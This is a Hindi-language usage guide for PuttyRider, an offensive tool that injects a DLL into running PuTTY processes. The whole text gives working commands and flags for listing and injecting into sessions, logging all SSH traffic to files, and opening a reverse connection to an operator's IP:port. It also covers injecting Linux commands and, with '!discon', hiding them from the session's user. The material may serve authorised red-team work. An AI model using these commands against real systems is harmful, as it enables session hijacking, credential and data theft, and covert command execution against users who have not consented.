
Putty सत्रों को हाइजैक करें ताकि वार्तालाप सूंघ सकें और Linux कमांड इंजेक्ट कर सकें।
Putty सत्रों को हाइजैक करें ताकि संवाद सूँघ सकें और Linux कमांड इंजेक्ट कर सकें।
चल रही Putty प्रक्रियाओं और उनकी स्थिति (इंजेक्टेड / इंजेक्टेड नहीं) की सूची बनाएं
PuttyRider.exe -l
पहले मिले putty.exe में DLL इंजेक्ट करें और DLL से मेरे IP:Port पर एक रिवर्स कनेक्शन शुरू करें, फिर PuttyRider.exe से बाहर निकलें।
PuttyRider.exe -p 0 -r 192.168.0.55:8080
बैकग्राउंड में चलाएं और नई Putty प्रक्रियाओं की प्रतीक्षा करें। किसी भी नए putty.exe में इंजेक्ट करें और सभी संवादों को स्थानीय फ़ाइलों में लिखें।
PuttyRider.exe -w -f
सभी Putty प्रक्रियाओं से PuttyRider.dll को बाहर निकालें जहां यह पहले से इंजेक्ट है। (अगर -w मोड में चल रहा है तो PuttyRider.exe को मारना न भूलें, अन्यथा यह फिर से इंजेक्ट कर देगा।)
PuttyRider.exe -x
संचालन मोड:
-l चल रही Putty प्रक्रियाओं और उनके कनेक्शनों की सूची बनाएं
-w सभी मौजूदा Putty सत्रों में इंजेक्ट करें और नए सत्रों की प्रतीक्षा करें
उनमें भी इंजेक्ट करने के लिए
-p PID केवल PID द्वारा पहचाने गए मौजूदा Putty सत्र में इंजेक्ट करें।
यदि PID==0, तो पहले मिले Putty में इंजेक्ट करें
-x सफाई। सभी चल रही Putty इंस्टेंसेस से DLL हटाएं
-d डीबग मोड। केवल -p मोड के साथ काम करता है
-c CMD सफल इंजेक्शन के बाद स्वचालित रूप से एक Linux कमांड निष्पादित करें
PuttyRider CMD से अंतिम रिक्त स्थान और '&' वर्ण हटाएगा
PuttyRider CMD में " 1>/dev/null 2>/dev/null &" जोड़ेगा
-h यह सहायता प्रिंट करें
आउटपुट मोड:
-f सभी Putty संवाद को स्थानीय निर्देशिका में एक फ़ाइल में लिखें।
फ़ाइल नाम में वर्तमान putty.exe का PID जुड़ा होगा
-r IP:PORT निर्दिष्ट मशीन पर एक रिवर्स कनेक्शन शुरू करें और
एक इंटरैक्टिव सत्र शुरू करें।
इंटरैक्टिव कमांड (रिवर्स कनेक्शन प्राप्त करने के बाद):
!status देखें कि क्या Putty विंडो उपयोगकर्ता इनपुट से जुड़ी है
!discon मुख्य Putty विंडो को डिस्कनेक्ट करें ताकि यह कुछ भी प्रदर्शित न करे
यह उपयोगकर्ता को बिना सूचित किए कमांड भेजने के लिए उपयोगी है
!recon Putty विंडो को उसके सामान्य संचालन मोड में पुनः कनेक्ट करें
CMD Linux शेल कमांड
!exit इस कनेक्शन को समाप्त करें
!help क्लाइंट कनेक्शन के लिए सहायता प्रदर्शित करें
Visual Studio कमांड प्रॉम्प्ट का उपयोग करें:
nmake main dll
इनसोम्निया सिक्योरिटी के Brett Moore को उनके प्रूफ ऑफ कॉन्सेप्ट PuttyHijack के लिए धन्यवाद।